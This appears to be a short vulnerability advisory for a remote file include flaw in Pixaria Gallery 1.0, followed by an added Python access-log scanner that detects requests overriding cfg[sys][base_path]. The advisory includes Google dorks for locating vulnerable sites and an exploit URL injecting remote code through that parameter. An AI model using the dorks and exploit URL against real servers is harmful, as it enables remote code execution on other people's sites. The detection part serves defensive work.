Pixaria Gallery 1.0 (class.Smarty.php) Remote File Include Vulnerability




-----------------------------------------------------------------------------------------
# scripts       : Pixaria Gallery 1.0
# Discovered By : irvian
# scripts site : http://pixaria.com/ 
# Thanks To     : #hitamputih #nyubicrew #patihack
# special To    : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz
# dork          : powered by Pixaria™ Gallery
#                 inurl:index.gallery.php?gid
-----------------------------------------------------------------------------------------
bug found: 

/resources/includes/class.Smarty.php

// Load the main Smarty class
require_once ($cfg['sys']['base_path'] . "resources/smarty/libs/Smarty.class.php");


Exploit: http://www.target.com/resources/includes/class.Smarty.php?cfg[sys][base_path]=[evilcode] 
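
For defenders, a log check for requests that set the `cfg[sys][base_path]` parameter on the include file named above. This is an added example, not part of the original advisory; it assumes a common/combined-format web access log, and the sample lines, function names and verdict labels are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed sample access-log lines: addresses, hosts and values are made up.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.gallery.php?gid=3 HTTP/1.1" 200 5120
198.51.100.9 - - [01/Jan/2024:10:00:05 +0000] "GET /resources/includes/class.Smarty.php?cfg[sys][base_path]=http://example.invalid/ HTTP/1.1" 200 312
198.51.100.9 - - [01/Jan/2024:10:00:09 +0000] "GET /resources/includes/class.Smarty.php?cfg%5Bsys%5D%5Bbase_path%5D=ftp%3A%2F%2Fexample.invalid%2F HTTP/1.1" 200 298
203.0.113.4 - - [01/Jan/2024:10:01:00 +0000] "GET /resources/includes/class.Smarty.php?cfg[sys][base_path]=/tmp/ HTTP/1.1" 500 0
203.0.113.8 - - [01/Jan/2024:10:02:00 +0000] "GET /resources/includes/class.Smarty.php HTTP/1.1" 500 0
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
VULN_PATH = "/resources/includes/class.Smarty.php"      # path from the advisory
PARAM = "cfg[sys][base_path]"                           # parameter from the advisory
REMOTE_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)  # any scheme://, e.g. http, ftp


def classify(line):
    """Return (client_ip, verdict) for a request that sets the base path, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    if not unquote(path).endswith(VULN_PATH):
        return None
    # parse_qsl percent-decodes names and values, so cfg%5Bsys%5D... is caught too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name == PARAM:
            remote = REMOTE_RE.match(value) is not None
            return m.group("ip"), "remote-include" if remote else "base-path-override"
    return None


def scan(log_text):
    """Classify every line of a log and return the list of hits in order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(ip, verdict)
```

A legitimate client never needs to request this file directly, so any hit is worth reviewing; the parameter can only reach `$cfg` when PHP's `register_globals` is enabled.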
         
